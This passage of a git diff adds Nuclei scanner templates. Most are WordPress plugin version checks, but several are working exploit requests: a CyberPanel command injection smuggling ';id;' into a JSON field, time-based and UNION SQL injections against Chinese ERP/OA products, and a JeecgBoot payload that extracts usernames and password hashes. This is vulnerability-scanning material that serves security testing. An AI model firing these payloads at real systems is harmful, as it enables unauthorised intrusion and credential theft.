'<= 1.0.2') \ No newline at end of file diff --git a/poc/sql/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml b/poc/sql/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml new file mode 100644 index 0000000000..74cd0f9c53 --- /dev/null +++ b/poc/sql/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d + +info: + name: > + Koalendar – Events & Appointments Booking Calendar <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via height Parameter + author: topscoder + severity: low + description: > + The Koalendar – Events & Appointments Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘height’ parameter in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cbbbf5fe-0369-4de6-9b2f-957286b6f394?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11855 + metadata: + fofa-query: "wp-content/plugins/koalendar-free-booking-widget/" + google-query: inurl:"/wp-content/plugins/koalendar-free-booking-widget/" + shodan-query: 'vuln:CVE-2024-11855' + tags: cve,wordpress,wp-plugin,koalendar-free-booking-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/koalendar-free-booking-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "koalendar-free-booking-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/sql/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml b/poc/sql/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml new file mode 100644 index 0000000000..938460803e --- /dev/null +++ b/poc/sql/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53 + +info: + name: > + Companion Portfolio – Responsive Portfolio Plugin <= 2.4.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Companion Portfolio – Responsive Portfolio Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'companion-portfolio' shortcode in all versions up to, and including, 2.4.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/21df75e6-1f3e-4a08-a620-92b44fb48899?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11867 + metadata: + fofa-query: "wp-content/plugins/companion-portfolio/" + google-query: inurl:"/wp-content/plugins/companion-portfolio/" + shodan-query: 'vuln:CVE-2024-11867' + tags: cve,wordpress,wp-plugin,companion-portfolio,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/companion-portfolio/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "companion-portfolio" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.0.1') \ No newline at end of file diff --git a/poc/sql/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml b/poc/sql/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml new file mode 100644 index 0000000000..bbbe0e8e1e --- /dev/null +++ b/poc/sql/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11869-50ed005605a356d0d3b23edb855715d9 + +info: + name: > + Buk for WordPress <= 1.0.7 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Buk for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'buk' shortcode in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc1ebc34-d728-42b4-92b4-9e1a4ebd88b2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11869 + metadata: + fofa-query: "wp-content/plugins/buk-appointments/" + google-query: inurl:"/wp-content/plugins/buk-appointments/" + shodan-query: 'vuln:CVE-2024-11869' + tags: cve,wordpress,wp-plugin,buk-appointments,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/buk-appointments/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "buk-appointments" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.7') \ No newline at end of file diff --git a/poc/sql/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml b/poc/sql/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml new file mode 100644 index 0000000000..28dc3ec7f2 --- /dev/null +++ b/poc/sql/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849 + +info: + name: > + Connatix Video Embed <= 1.0.5 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Connatix Video Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cnx_script_code' shortcode in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/89512190-a0fe-495a-9dda-8d8540a5325c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11883 + metadata: + fofa-query: "wp-content/plugins/connatix-video-embed/" + google-query: inurl:"/wp-content/plugins/connatix-video-embed/" + shodan-query: 'vuln:CVE-2024-11883' + tags: cve,wordpress,wp-plugin,connatix-video-embed,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/connatix-video-embed/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "connatix-video-embed" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.5') \ No newline at end of file diff --git a/poc/sql/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml b/poc/sql/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml new file mode 100644 index 0000000000..645549d8ce --- /dev/null +++ b/poc/sql/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6 + +info: + name: > + Crafthemes Demo Import <= 3.3 - Authenticated (Admin+) Arbitrary File Upload in process_uploaded_files + author: topscoder + severity: low + description: > + The Crafthemes Demo Import plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'process_uploaded_files' function in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e44dd0e8-e6e7-4a2d-b9ca-abd1de273092?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-9698 + metadata: + fofa-query: "wp-content/plugins/crafthemes-demo-import/" + google-query: inurl:"/wp-content/plugins/crafthemes-demo-import/" + shodan-query: 'vuln:CVE-2024-9698' + tags: cve,wordpress,wp-plugin,crafthemes-demo-import,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/crafthemes-demo-import/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "crafthemes-demo-import" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3') \ No newline at end of file diff --git a/poc/sql/adbuddy-adblocker-detection.yaml b/poc/sql/adbuddy-adblocker-detection.yaml new file mode 100644 index 0000000000..ef8c6f2261 --- /dev/null +++ b/poc/sql/adbuddy-adblocker-detection.yaml @@ -0,0 +1,59 @@ +id: adbuddy-adblocker-detection-3bb46498f1afb79669fda4714744548d + +info: + name: > + adBuddy+ (AdBlocker Detection) by NetfunkDesign <= 1.1.3 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fd0a887-db61-4b2d-af52-ec1d9c525663?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/adbuddy-adblocker-detection/" + google-query: inurl:"/wp-content/plugins/adbuddy-adblocker-detection/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,adbuddy-adblocker-detection,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/adbuddy-adblocker-detection/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "adbuddy-adblocker-detection" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.3') \ No newline at end of file diff --git a/poc/sql/cricket-score-e44fdb3a4ce9acdbe0ece5ab8b5a4c4a.yaml b/poc/sql/cricket-score-e44fdb3a4ce9acdbe0ece5ab8b5a4c4a.yaml new file mode 100644 index 0000000000..c75b766d8e --- /dev/null +++ b/poc/sql/cricket-score-e44fdb3a4ce9acdbe0ece5ab8b5a4c4a.yaml @@ -0,0 +1,59 @@ +id: cricket-score-e44fdb3a4ce9acdbe0ece5ab8b5a4c4a + +info: + name: > + Cricket Live Score <= 2.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d9fe750f-5d8f-4c47-9d75-d928f1367fa8?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cricket-score/" + google-query: inurl:"/wp-content/plugins/cricket-score/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cricket-score,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cricket-score/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cricket-score" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.2') \ No newline at end of file diff --git a/poc/sql/cyberpanel-upgrademysqlstatus-rce.yaml b/poc/sql/cyberpanel-upgrademysqlstatus-rce.yaml new file mode 100644 index 0000000000..9527fa8bbe --- /dev/null +++ b/poc/sql/cyberpanel-upgrademysqlstatus-rce.yaml @@ -0,0 +1,24 @@ +id: cyberpanel-upgrademysqlstatus-rce + +info: + name: cyberpanel-upgrademysqlstatus-rce + author: PokerSec + severity: critical + metadata: + fofasearch: app="CyberPanel" + +http: + - raw: + - | + GET /dataBases/upgrademysqlstatus HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 + Content-Type: application/json + Connection: close + + {"statusfile":"1;id;#"} + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"uid=") && contains_all(body,"gid=") \ No newline at end of file diff --git a/poc/sql/fanwei-Ecology-LoginSSO-sqli.yaml b/poc/sql/fanwei-Ecology-LoginSSO-sqli.yaml new file mode 100644 index 0000000000..2c70d7a8b4 --- /dev/null +++ b/poc/sql/fanwei-Ecology-LoginSSO-sqli.yaml @@ -0,0 +1,29 @@ +id: fanwei-Ecology-LoginSSO-sqli + +info: + name: fanwei-Ecology-LoginSSO-sqli + author: PokerSec + severity: high + metadata: + fofasearch: app="泛微-OA(e-cology)" + +requests: + - raw: + - |+ + GET /weaver/FileDownloadLocation/login/LoginSSO.%2520jsp?ddcode=7ea7ef3c41d67297&mrfuuid=1%27;if+db_name(1)=%27master%27+WAITFOR+delay+%270:0:3%27--+&mailid=0&a=.swf HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + + matchers: + - type: dsl + condition: and + dsl: + - duration > 3 && duration < 6 && status_code==302 + + + + extractors: + - type: dsl + dsl: + - duration \ No newline at end of file diff --git a/poc/sql/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml b/poc/sql/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml new file mode 100644 index 0000000000..85846ae883 --- /dev/null +++ b/poc/sql/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml @@ -0,0 +1,28 @@ +id: fanwei-Ecology-browser-sqli + +info: + name: fanwei-Ecology-browser-sqli + author: PokerSec + severity: high + metadata: + fofasearch: app="泛微-OA(e-cology)" + +requests: + - raw: + - |- + POST /mobile/%20/plugin/browser.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%36%34%25%32%35%25%33%32%25%33%37%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%39%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - countSql + - baseSql + - type: status + status: + - 200 diff --git a/poc/sql/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml b/poc/sql/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml new file mode 100644 index 0000000000..5396874e7a --- /dev/null +++ b/poc/sql/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml @@ -0,0 +1,59 @@ +id: ims-countdown-afc1b693115a4259c31be875ae4878db + +info: + name: > + IMS Countdown <= 1.3.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2de22728-4f67-406c-9db5-33cbba4c15eb?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ims-countdown/" + google-query: inurl:"/wp-content/plugins/ims-countdown/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ims-countdown,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ims-countdown/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ims-countdown" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.4') \ No newline at end of file diff --git a/poc/sql/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml b/poc/sql/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml new file mode 100644 index 0000000000..fb0e831cf5 --- /dev/null +++ b/poc/sql/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml @@ -0,0 +1,23 @@ +id: jeecg-boot-getTotalData-sqli-CVE-2024-48307 + +info: + name: jeecg-boot-getTotalData-sqli-CVE-2024-48307 + author: PokerSec + severity: high + metadata: + fofasearch: app="JeecgBoot-企业级低代码平台" || body="/_app.config.js?v=3.7.1" + +http: + - raw: + - |- + POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(username,0x3a,password)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}} + + matchers: + - type: dsl + condition: and + dsl: + - status_code==200 && contains_all(body,"chartData") && contains_all(body,"concat(username") && contains_all(body,"yAxisIndex") \ No newline at end of file diff --git a/poc/sql/movie-database.yaml b/poc/sql/movie-database.yaml new file mode 100644 index 0000000000..4ab079df9b --- /dev/null +++ b/poc/sql/movie-database.yaml @@ -0,0 +1,59 @@ +id: movie-database-b1e09ab8611ddb31d85cd0e793d89389 + +info: + name: > + Movie Database <= 1.0.11 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e3d8daef-787d-43f1-a438-958295294f6c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/movie-database/" + google-query: inurl:"/wp-content/plugins/movie-database/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,movie-database,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/movie-database/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "movie-database" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.11') \ No newline at end of file diff --git a/poc/sql/qiwang-ERP-drawGrid-sqli.yaml b/poc/sql/qiwang-ERP-drawGrid-sqli.yaml new file mode 100644 index 0000000000..ff2f12c411 --- /dev/null +++ b/poc/sql/qiwang-ERP-drawGrid-sqli.yaml @@ -0,0 +1,29 @@ +id: qiwang-ERP-drawGrid-sqli + +info: + name: qiwang-ERP-drawGrid-sqli + author: PokerSec + severity: critical + metadata: + fofasearch: app="企望-ERP系统" + +http: + - raw: + - | + POST /mainFunctions/drawGrid.action;cookieLogin.action HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + tablename=1';WAITFOR DELAY '0:0:3'-- + + + matchers: + - type: dsl + condition: and + dsl: + - status_code==200 && duration > 3 && duration < 6 + + extractors: + - type: dsl + dsl: + - duration \ No newline at end of file diff --git a/poc/sql/sip-calculator-03696418e2ddb2e57359bcf1347e1091.yaml b/poc/sql/sip-calculator-03696418e2ddb2e57359bcf1347e1091.yaml new file mode 100644 index 0000000000..bd45e9382f --- /dev/null +++ b/poc/sql/sip-calculator-03696418e2ddb2e57359bcf1347e1091.yaml @@ -0,0 +1,59 @@ +id: sip-calculator-03696418e2ddb2e57359bcf1347e1091 + +info: + name: > + SIP Calculator <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/03afffcc-02fe-4054-8876-6a4e4d9de071?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/sip-calculator/" + google-query: inurl:"/wp-content/plugins/sip-calculator/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,sip-calculator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sip-calculator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sip-calculator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/sql/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml b/poc/sql/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml new file mode 100644 index 0000000000..9fe7706c2e --- /dev/null +++ b/poc/sql/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml @@ -0,0 +1,59 @@ +id: wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd + +info: + name: > + WP Job Portal <= 2.2.1 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5d8961fd-68ac-4a10-ab26-cfcda27c18e8?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-job-portal,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.1') \ No newline at end of file diff --git a/poc/sql/ymc-states-map-696be7426132daf80e136f71893126db.yaml b/poc/sql/ymc-states-map-696be7426132daf80e136f71893126db.yaml new file mode 100644 index 0000000000..e4b2bb1cc9 --- /dev/null +++ b/poc/sql/ymc-states-map-696be7426132daf80e136f71893126db.yaml @@ -0,0 +1,59 @@ +id: ymc-states-map-696be7426132daf80e136f71893126db + +info: + name: > + States Map US <= 2.4.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bdd07160-721b-4807-a227-72cd91faef39?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ymc-states-map/" + google-query: inurl:"/wp-content/plugins/ymc-states-map/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ymc-states-map,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ymc-states-map/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ymc-states-map" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.2') \ No newline at end of file diff --git a/poc/sql/yongyou-nc-process-sqli.yaml b/poc/sql/yongyou-nc-process-sqli.yaml new file mode 100644 index 0000000000..d4310a0d4c --- /dev/null +++ b/poc/sql/yongyou-nc-process-sqli.yaml @@ -0,0 +1,26 @@ +id: yongyou-nc-process-sqli + +info: + name: yongyou-nc-process-sqli + author: PokerSec + severity: high + metadata: + fofasearch: body="/Client/Uclient/UClient.exe" || app="用友-UFIDA-NC" + +http: + - raw: + - | + GET /portal/pt/task/process?pageId=login&id=1&pluginid=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(118)||CHR(98)||CHR(118)||CHR(113)||CHR(113)||CHR(107)||CHR(98)||CHR(106)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20 HTTP/1.1 + Host: {{Hostname}} + + - | + GET /portal/pt/task/process?pageId=login&id=1&pluginid=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2BISNULL%28CAST%28111%2A1111%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 HTTP/1.1 + Host: {{Hostname}} + + 